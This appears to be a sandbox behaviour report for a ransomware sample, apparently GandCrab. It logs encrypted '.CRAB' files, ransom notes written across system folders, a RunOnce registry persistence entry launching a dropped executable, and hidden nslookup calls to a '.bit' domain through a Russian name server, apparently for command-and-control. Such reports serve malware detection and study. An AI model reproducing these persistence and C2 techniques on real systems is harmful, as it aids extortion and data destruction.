Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\mTXC 3V.avi type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\nDxx_AcLmR8Id.jpg type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\nqG5jvy_8vyLOs.avi type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\P-6J-4erJllWGU.odt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\q-bzLPjgvN.wav type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\TH-SgXsaCxAtFhs.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\tmXYFRsX11CKD.gif type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\v07Ls34TtI2e2.pptx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\XIyJzuCAZKp7FI8XtdfZ.wav type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\ZCj BRzcwQ34J_4sU.jpg type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Zpb7MEqh0 CYJOL.m4a type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\3YtnfBFuH2syxVeLR.swf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\58mWnEiPpJO.ods type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\5a0xsIsvo9B Pz5hE.flv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\6DFLkl3W-.swf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\C7oIN7zl yMfBY.mkv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\CgT8pG5C0n_2xIEfr_F.flv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\CokgiJbfo.swf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\dCKKx1mIUZT.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\jIagDhQZbJ.gif type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\jXrYf3.gif type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\0qL6S4uErTccQAF-Dv.m4a type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\hFrFPxb8MV.flv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\nPxPXby_sXNq.m4a type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\z TAdGvNC.gif type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\6d4RVnD5zczUhoZiuu\Z0c7R042i.gif type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\75_MC9kMrPv.docx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\dhBExWsWg.mkv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\9wMt0MFWi9yy6f_c4.xls type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\KtvotL7\lehvzlvqqsCKy\d7b9sC4Na0cYWewrK-84.wav type = file_attributes True 1
Fn
Read C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite.CRAB size = 1048576, size_out = 524288 True 1
Fn
Read C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite.CRAB size = 1048576, size_out = 1048576 True 5
Fn
Read C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite.CRAB size = 1048576, size_out = 0 True 1
Fn
Write C:\Program Files\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Write C:\Program Files (x86)\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Write C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Write C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Write C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Write C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
Write C:\Users\FD1HVy\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt size = 4290 True 1
Fn
For performance reasons, the remaining 2231 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (132)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = czpikmsbwhg, data = "C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe", size = 108, type = REG_SZ True 1
Fn
Process (10)
»
Operation Process Additional Information Success Count Logfile
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x1128, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x1220, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x124c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x135c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x1068, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x1100, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x1120, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0x113c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup zonealarm.bit ns1.corp-servers.ru os_pid = 0xe0c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create C:\WINDOWS\system32\wbem\wmic show_window = SW_HIDE True 1
Fn
Module (1983)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x75ae0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75ae0000 True 2
Fn
Load USER32.dll base_address = 0x76300000 True 2
Fn
Load ntdll.dll base_address = 0x77350000 True 1
Fn
Load msvcr100.dll base_address = 0x73d50000 True 1
Fn
Load GDI32.dll base_address = 0x76440000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76e20000 True 1
Fn
Load SHELL32.dll base_address = 0x742d0000 True 1
Fn
Load CRYPT32.dll base_address = 0x76ca0000 True 1
Fn
Load WININET.dll base_address = 0x73890000 True 1
Fn
Load PSAPI.DLL base_address = 0x75620000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75ae0000 True 4
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77350000 True 21
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76e20000 True 840
Fn
Get Filename - process_name = c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\fd1hvy\appdata\roaming\microsoft\ibpbzu.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe, size = 256 True 10
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75af4ae0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75af4b20 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75af4b40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75af4b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x75af5b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x75af6a30 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x75af5a80 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75af6970 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x75af69d0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75af56d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x75af67e0 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75af3cb0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75af5cc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x75af6760 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x75b4ef10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75af5090 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75b4ed10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x773b6390 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75af6c70 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75af5010 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75af51b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75b4eab0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x75b4f130 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x75af6620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75b4f450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75b4f440 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x75b4ee70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x75af4cb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75af4f00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75af8820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x773b29e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x773b1ec0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75af5110 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x75af5c40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x75af6b10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75af51f0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x75af5330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75b4ef60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x7737fb90 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75af5320 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75af5070 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75b4f180 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75af5da0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75b4ea20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75af5530 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x75af4eb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x75af4c20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75af5930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75af5960 True 2
Fn
